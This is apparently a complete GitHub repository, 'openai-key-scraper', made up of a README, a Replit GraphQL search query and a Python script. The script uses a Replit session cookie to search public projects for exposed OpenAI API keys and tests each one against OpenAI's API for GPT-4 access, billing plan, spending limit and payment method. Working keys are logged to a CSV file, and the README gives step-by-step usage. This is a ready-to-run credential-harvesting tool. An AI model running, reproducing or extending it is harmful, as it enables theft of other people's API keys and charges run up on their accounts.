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But first, please read 674 | . -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # OpenAI API Key Scraper 2 | 3 | This is a Python script to scrape OpenAI API keys that are exposed on public Replit projects. 4 | 5 | Inspired by [this article](https://www.vice.com/en/article/93kkky/people-pirating-gpt4-scraping-openai-api-keys). 6 | 7 | ## Installation and Usage: 8 | 1. Clone this repository by running the following commands: 9 | ``` 10 | git clone https://github.com/ading2210/openai-key-scraper 11 | cd openai-key-scraper 12 | ``` 13 | 2. Obtain your Replit cookie by going to the network tab of your browser's devtools while on replit.com, searching for `graphql`, and copying the value in the `Cookie` request header. You may need to reload the page for the requests to show up. 14 | 3. Run the script using the following command: 15 | ``` 16 | python3 main.py "TOKEN_HERE" 17 | ``` 18 | 19 | It is recommended that you set a custom search query. You can do that by passing another argument into the script, like in the following example: 20 | ``` 21 | python3 main.py "TOKEN" "sk- chatgpt" 22 | ``` 23 | Make sure your queries always have `sk-` at the beginning. For best results, include terms that are likely to show up in code that uses the OpenAI API. 24 | 25 | ## Copyright: 26 | This program is licensed under the [GNU GPL v3](https://www.gnu.org/licenses/gpl-3.0.txt). 27 | 28 | ``` 29 | ading2210/openai-key-scraper: a Python script to scrape OpenAI API keys that are exposed on public Replit projects 30 | Copyright (C) 2023 ading2210 31 | 32 | This program is free software: you can redistribute it and/or modify 33 | it under the terms of the GNU General Public License as published by 34 | the Free Software Foundation, either version 3 of the License, or 35 | (at your option) any later version. 36 | 37 | This program is distributed in the hope that it will be useful, 38 | but WITHOUT ANY WARRANTY; without even the implied warranty of 39 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 40 | GNU General Public License for more details. 41 | 42 | You should have received a copy of the GNU General Public License 43 | along with this program. If not, see . 44 | ``` -------------------------------------------------------------------------------- /graphql/SearchPageSearchResults.graphql: -------------------------------------------------------------------------------- 1 | query SearchPageSearchResults($options: SearchQueryOptions!) { 2 | search(options: $options) { 3 | ...SearchPageResults 4 | ... on UserError { 5 | message 6 | __typename 7 | } 8 | ... on UnauthorizedError { 9 | message 10 | __typename 11 | } 12 | ... on TooManyRequestsError { 13 | message 14 | __typename 15 | } 16 | __typename 17 | } 18 | } 19 | 20 | fragment SearchPageResults on SearchQueryResults { 21 | userResults { 22 | hitInfo { 23 | ...HitInfo 24 | __typename 25 | } 26 | results { 27 | pageInfo { 28 | ...PageInfo 29 | __typename 30 | } 31 | items { 32 | id 33 | ...SearchPageResultsUser 34 | __typename 35 | } 36 | __typename 37 | } 38 | __typename 39 | } 40 | replResults { 41 | hitInfo { 42 | ...HitInfo 43 | __typename 44 | } 45 | results { 46 | pageInfo { 47 | ...PageInfo 48 | __typename 49 | } 50 | items { 51 | id 52 | ...SearchPageResultsRepl 53 | __typename 54 | } 55 | __typename 56 | } 57 | __typename 58 | } 59 | templateResults { 60 | hitInfo { 61 | ...HitInfo 62 | __typename 63 | } 64 | results { 65 | pageInfo { 66 | ...PageInfo 67 | __typename 68 | } 69 | items { 70 | id 71 | ...SearchPageResultsTemplate 72 | __typename 73 | } 74 | __typename 75 | } 76 | __typename 77 | } 78 | postResults { 79 | hitInfo { 80 | ...HitInfo 81 | __typename 82 | } 83 | results { 84 | pageInfo { 85 | ...PageInfo 86 | __typename 87 | } 88 | items { 89 | id 90 | ...SearchPageResultsPost 91 | __typename 92 | } 93 | __typename 94 | } 95 | __typename 96 | } 97 | docResults { 98 | hitInfo { 99 | ...HitInfo 100 | __typename 101 | } 102 | results { 103 | pageInfo { 104 | ...PageInfo 105 | __typename 106 | } 107 | items { 108 | ...SearchPageResultsDoc 109 | __typename 110 | } 111 | __typename 112 | } 113 | __typename 114 | } 115 | fileResults { 116 | hitInfo { 117 | ...HitInfo 118 | __typename 119 | } 120 | results { 121 | pageInfo { 122 | ...PageInfo 123 | __typename 124 | } 125 | items { 126 | ...SearchPageResultsFile 127 | __typename 128 | } 129 | __typename 130 | } 131 | __typename 132 | } 133 | __typename 134 | } 135 | 136 | fragment HitInfo on SearchQueryHitInfo { 137 | totalHits 138 | totalPages 139 | __typename 140 | } 141 | 142 | fragment PageInfo on PageInfo { 143 | hasPreviousPage 144 | hasNextPage 145 | nextCursor 146 | previousCursor 147 | __typename 148 | } 149 | 150 | fragment SearchPageResultsUser on User { 151 | id 152 | username 153 | fullName 154 | bio 155 | image 156 | url 157 | ...UserRoles 158 | __typename 159 | } 160 | 161 | fragment UserRoles on User { 162 | roles( 163 | only: [ADMIN, MODERATOR, PATRON, PYTHONISTA, DETECTIVE, LANGUAGE_JAMMER, FEATURED, REPLIT_REP, REPLIT_REP_EDU] 164 | ) { 165 | id 166 | name 167 | key 168 | tagline 169 | __typename 170 | } 171 | __typename 172 | } 173 | 174 | fragment SearchPageResultsRepl on Repl { 175 | id 176 | ...ReplPostReplCardRepl 177 | __typename 178 | } 179 | 180 | fragment ReplPostReplCardRepl on Repl { 181 | id 182 | iconUrl 183 | description(plainText: true) 184 | ...ReplPostReplInfoRepl 185 | ...ReplStatsRepl 186 | ...ReplLinkRepl 187 | tags { 188 | id 189 | ...PostsFeedNavTag 190 | __typename 191 | } 192 | owner { 193 | ... on Team { 194 | id 195 | username 196 | url 197 | image 198 | __typename 199 | } 200 | ... on User { 201 | id 202 | username 203 | url 204 | image 205 | __typename 206 | } 207 | __typename 208 | } 209 | __typename 210 | } 211 | 212 | fragment ReplPostReplInfoRepl on Repl { 213 | id 214 | title 215 | description(plainText: true) 216 | imageUrl 217 | iconUrl 218 | templateInfo { 219 | label 220 | iconUrl 221 | __typename 222 | } 223 | __typename 224 | } 225 | 226 | fragment ReplStatsRepl on Repl { 227 | id 228 | likeCount 229 | runCount 230 | commentCount 231 | __typename 232 | } 233 | 234 | fragment ReplLinkRepl on Repl { 235 | id 236 | url 237 | nextPagePathname 238 | __typename 239 | } 240 | 241 | fragment PostsFeedNavTag on Tag { 242 | id 243 | isOfficial 244 | __typename 245 | } 246 | 247 | fragment SearchPageResultsTemplate on Repl { 248 | id 249 | ...TemplateReplCardRepl 250 | __typename 251 | } 252 | 253 | fragment TemplateReplCardRepl on Repl { 254 | id 255 | iconUrl 256 | templateCategory 257 | title 258 | description(plainText: true) 259 | releasesForkCount 260 | templateLabel 261 | likeCount 262 | url 263 | owner { 264 | ... on User { 265 | id 266 | ...TemplateReplCardFooterUser 267 | __typename 268 | } 269 | ... on Team { 270 | id 271 | ...TemplateReplCardFooterTeam 272 | __typename 273 | } 274 | __typename 275 | } 276 | deployment { 277 | id 278 | activeRelease { 279 | id 280 | __typename 281 | } 282 | __typename 283 | } 284 | publishedAs 285 | __typename 286 | } 287 | 288 | fragment TemplateReplCardFooterUser on User { 289 | id 290 | username 291 | image 292 | url 293 | __typename 294 | } 295 | 296 | fragment TemplateReplCardFooterTeam on Team { 297 | id 298 | username 299 | image 300 | url 301 | __typename 302 | } 303 | 304 | fragment SearchPageResultsPost on Post { 305 | id 306 | ...ReplPostPost 307 | ...ReplCardPostPost 308 | ...OldPostPost 309 | __typename 310 | } 311 | 312 | fragment ReplPostPost on Post { 313 | id 314 | title 315 | timeCreated 316 | isPinned 317 | isAnnouncement 318 | ...ReplViewPostActionPermissions 319 | replComment { 320 | id 321 | body(removeMarkdown: true) 322 | __typename 323 | } 324 | repl { 325 | id 326 | ...ReplViewReplActionsPermissions 327 | ...ReplPostRepl 328 | __typename 329 | } 330 | user { 331 | id 332 | ...ReplPostUserPostUser 333 | __typename 334 | } 335 | recentReplComments { 336 | id 337 | ...ReplPostReplComment 338 | __typename 339 | } 340 | __typename 341 | } 342 | 343 | fragment ReplViewPostActionPermissions on Post { 344 | id 345 | isHidden 346 | __typename 347 | } 348 | 349 | fragment ReplViewReplActionsPermissions on Repl { 350 | id 351 | slug 352 | lastPublishedAt 353 | publishedAs 354 | owner { 355 | ... on User { 356 | id 357 | username 358 | __typename 359 | } 360 | ... on Team { 361 | id 362 | username 363 | __typename 364 | } 365 | __typename 366 | } 367 | templateReview { 368 | id 369 | promoted 370 | __typename 371 | } 372 | currentUserPermissions { 373 | publish 374 | containerWrite 375 | __typename 376 | } 377 | ...UnpublishReplRepl 378 | ...ReplLinkRepl 379 | __typename 380 | } 381 | 382 | fragment UnpublishReplRepl on Repl { 383 | id 384 | commentCount 385 | likeCount 386 | runCount 387 | publishedAs 388 | __typename 389 | } 390 | 391 | fragment ReplPostRepl on Repl { 392 | id 393 | ...ReplPostReplInfoRepl 394 | ...LikeButtonRepl 395 | ...ReplStatsRepl 396 | tags { 397 | id 398 | ...PostsFeedNavTag 399 | __typename 400 | } 401 | __typename 402 | } 403 | 404 | fragment LikeButtonRepl on Repl { 405 | id 406 | currentUserDidLike 407 | likeCount 408 | url 409 | wasPosted 410 | wasPublished 411 | __typename 412 | } 413 | 414 | fragment ReplPostUserPostUser on User { 415 | id 416 | username 417 | image 418 | ...UserLinkUser 419 | __typename 420 | } 421 | 422 | fragment UserLinkUser on User { 423 | id 424 | url 425 | username 426 | __typename 427 | } 428 | 429 | fragment ReplPostReplComment on ReplComment { 430 | id 431 | body 432 | timeCreated 433 | user { 434 | id 435 | ...ReplPostRecentCommentUser 436 | __typename 437 | } 438 | __typename 439 | } 440 | 441 | fragment ReplPostRecentCommentUser on User { 442 | id 443 | username 444 | image 445 | ...UserLinkUser 446 | __typename 447 | } 448 | 449 | fragment ReplCardPostPost on Post { 450 | id 451 | title 452 | timeCreated 453 | isPinned 454 | isAnnouncement 455 | ...ReplViewPostActionPermissions 456 | repl { 457 | id 458 | ...ReplViewReplActionsPermissions 459 | ...ReplCardPostRepl 460 | __typename 461 | } 462 | recentReplComments { 463 | id 464 | ...ReplPostReplComment 465 | __typename 466 | } 467 | user { 468 | id 469 | ...ReplPostUserPostUser 470 | __typename 471 | } 472 | __typename 473 | } 474 | 475 | fragment ReplCardPostRepl on Repl { 476 | id 477 | ...LikeButtonRepl 478 | ...ReplPostReplCardRepl 479 | recentComments { 480 | id 481 | ...ReplPostReplComment 482 | __typename 483 | } 484 | __typename 485 | } 486 | 487 | fragment OldPostPost on Post { 488 | id 489 | title 490 | preview(removeMarkdown: true, length: 150) 491 | url 492 | commentCount 493 | isPinned 494 | isAnnouncement 495 | timeCreated 496 | ...PostLinkPost 497 | user { 498 | id 499 | ...ReplPostUserPostUser 500 | __typename 501 | } 502 | repl { 503 | id 504 | ...ReplPostRepl 505 | __typename 506 | } 507 | board { 508 | id 509 | name 510 | color 511 | __typename 512 | } 513 | recentComments(count: 3) { 514 | id 515 | preview(removeMarkdown: true, length: 500) 516 | timeCreated 517 | user { 518 | id 519 | ...ReplPostRecentCommentUser 520 | __typename 521 | } 522 | __typename 523 | } 524 | __typename 525 | } 526 | 527 | fragment PostLinkPost on Post { 528 | id 529 | url 530 | __typename 531 | } 532 | 533 | fragment SearchPageResultsDoc on SearchResultIndexedDoc { 534 | path 535 | section 536 | contents 537 | contentMatches { 538 | start 539 | length 540 | __typename 541 | } 542 | __typename 543 | } 544 | 545 | fragment SearchPageResultsFile on SearchResultIndexedFile { 546 | repl { 547 | id 548 | title 549 | iconUrl 550 | url 551 | owner { 552 | ... on User { 553 | id 554 | image 555 | username 556 | __typename 557 | } 558 | ... on Team { 559 | id 560 | image 561 | username 562 | __typename 563 | } 564 | __typename 565 | } 566 | __typename 567 | } 568 | filePath 569 | fileContents 570 | fileContentMatches { 571 | start 572 | length 573 | __typename 574 | } 575 | __typename 576 | } 577 | -------------------------------------------------------------------------------- /main.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import sys 3 | import re 4 | import time 5 | import os 6 | import csv 7 | 8 | copyright_notice = """ 9 | COPYRIGHT NOTICE: 10 | 11 | ading2210/openai-key-scraper: a Python script to scrape OpenAI API keys that are exposed on public Replit projects 12 | Copyright (C) 2023 ading2210 13 | 14 | This program is free software: you can redistribute it and/or modify 15 | it under the terms of the GNU General Public License as published by 16 | the Free Software Foundation, either version 3 of the License, or 17 | (at your option) any later version. 18 | 19 | This program is distributed in the hope that it will be useful, 20 | but WITHOUT ANY WARRANTY; without even the implied warranty of 21 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 22 | GNU General Public License for more details. 23 | 24 | You should have received a copy of the GNU General Public License 25 | along with this program. If not, see . 26 | """.strip() 27 | 28 | graphql_url = "https://replit.com/graphql" 29 | graphql_headers = { 30 | "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0", 31 | "Accept": "*/*", 32 | "Accept-Language": "en-US,en;q=0.5", 33 | "Content-Type": "application/json", 34 | "x-requested-with": "XMLHttpRequest", 35 | "Sec-Fetch-Dest": "empty", 36 | "Sec-Fetch-Mode": "cors", 37 | "Sec-Fetch-Site": "same-origin", 38 | "Pragma": "no-cache", 39 | "Cache-Control": "no-cache", 40 | "Referrer": "https://replit.com/search", 41 | } 42 | 43 | with open("graphql/SearchPageSearchResults.graphql") as f: 44 | graphql_query = f.read() 45 | 46 | known_keys = [] 47 | if os.path.exists("found_keys.csv"): 48 | with open("found_keys.csv") as f: 49 | reader = csv.DictReader(f) 50 | for row in reader: 51 | known_keys.append(row["key"]) 52 | 53 | def perform_search(query, page, sort): 54 | payload = [{ 55 | "operationName": "SearchPageSearchResults", 56 | "variables": { 57 | "options": { 58 | "onlyCalculateHits": False, 59 | "categories": ["Files"], 60 | "query": query, 61 | "categorySettings": { 62 | "docs": {}, 63 | "files": { 64 | "page": { 65 | "first": 10, 66 | "after": str(page) 67 | }, 68 | "sort": sort, 69 | "exactMatch": False, 70 | "myCode": False 71 | } 72 | } 73 | } 74 | }, 75 | "query": graphql_query 76 | }] 77 | 78 | r = requests.post(graphql_url, headers=graphql_headers, json=payload) 79 | data = r.json() 80 | search = data[0]["data"]["search"] 81 | if not "fileResults" in search: 82 | if "message" in search: 83 | print("Replit returned an error. Retrying in 5 seconds...") 84 | print(search["message"]) 85 | time.sleep(5) 86 | return perform_search(query, page, sort) 87 | return [] 88 | file_results = data[0]["data"]["search"]["fileResults"]["results"]["items"] 89 | 90 | found_keys = [] 91 | key_regex = "sk-[a-zA-Z0-9]{48}" 92 | for result in file_results: 93 | file_contents = result["fileContents"] 94 | matches = re.findall(key_regex, file_contents) 95 | found_keys += matches 96 | return list(set(found_keys)) 97 | 98 | def validate_key(key): 99 | validation_url = "https://api.openai.com/v1/models/gpt-4" 100 | subscription_url = "https://api.openai.com/v1/dashboard/billing/subscription" 101 | usage_url = "https://api.openai.com/v1/dashboard/user/usage" #unused 102 | 103 | headers = { 104 | "Authorization": f"Bearer {key}" 105 | } 106 | r = requests.get(validation_url, headers=headers) 107 | 108 | if r.status_code == 401: 109 | return False #token revoked or invalid 110 | gpt_4 = r.status_code != 404 111 | 112 | subscription = requests.get(subscription_url, headers=headers).json() 113 | expiration = subscription["access_until"] 114 | if expiration < time.time(): 115 | return False #token expired 116 | hard_limit = subscription["hard_limit_usd"] or subscription["system_hard_limit_usd"] 117 | plan_id = subscription["plan"]["id"] 118 | payment_method = subscription["has_payment_method"] 119 | 120 | return { 121 | "key": key, 122 | "gpt4_allowed": gpt_4, 123 | "plan": plan_id, 124 | "limit": hard_limit, 125 | "payment_method": payment_method, 126 | "expiration": expiration 127 | } 128 | 129 | def log_key(key_info): 130 | exists = os.path.exists("found_keys.csv") 131 | with open("found_keys.csv", "a") as f: 132 | writer = csv.DictWriter(f, fieldnames=key_info.keys()) 133 | 134 | if not exists: 135 | writer.writeheader() 136 | 137 | writer.writerow(key_info) 138 | 139 | def search_all_pages(query): 140 | found_keys = [] 141 | valid_keys = [] 142 | for page in range(1, 21): 143 | print(f"Checking page {page}...") 144 | keys = perform_search(query, page, "RecentlyModified") 145 | print(f"Found {len(keys)} matches (not validated)") 146 | 147 | for key in keys: 148 | if key in found_keys: 149 | continue 150 | if key in known_keys: 151 | print(f"Found working key (cached): {key}") 152 | continue 153 | 154 | key_info = validate_key(key) 155 | if not key_info: 156 | continue 157 | 158 | valid_keys.append(key) 159 | log_key(key_info) 160 | found_message = "Found working key: {key} (gpt4: {gpt4_allowed}, plan: {plan}, limit: {limit}, payment method: {payment_method}, expiration: {expiration})" 161 | print(found_message.format(**key_info)) 162 | 163 | found_keys += keys 164 | 165 | return valid_keys 166 | 167 | if __name__ == "__main__": 168 | print(copyright_notice) 169 | input("\n======\n\nHit enter to continue and to confirm that you have read the copyright notice for this program. ") 170 | print("\n======\n") 171 | 172 | if len(sys.argv) < 2: 173 | raise IndexError("Cookie not provided. Pass in your cookie as the next argument. Like 'python3 main.py \"cookie_here\"'") 174 | cookie = sys.argv[1] 175 | graphql_headers["Cookie"] = cookie 176 | 177 | if len(sys.argv) > 2: 178 | query = sys.argv[2] 179 | else: 180 | query = "sk- openai" 181 | print("Warning: search query not provided, falling back to hard coded default") 182 | 183 | print(f"Searching with query: {query}") 184 | all_keys = search_all_pages(query) 185 | print("Search complete. Check found_keys.csv for results.") -------------------------------------------------------------------------------- /requirements.txt: -------------------------------------------------------------------------------- 1 | requests --------------------------------------------------------------------------------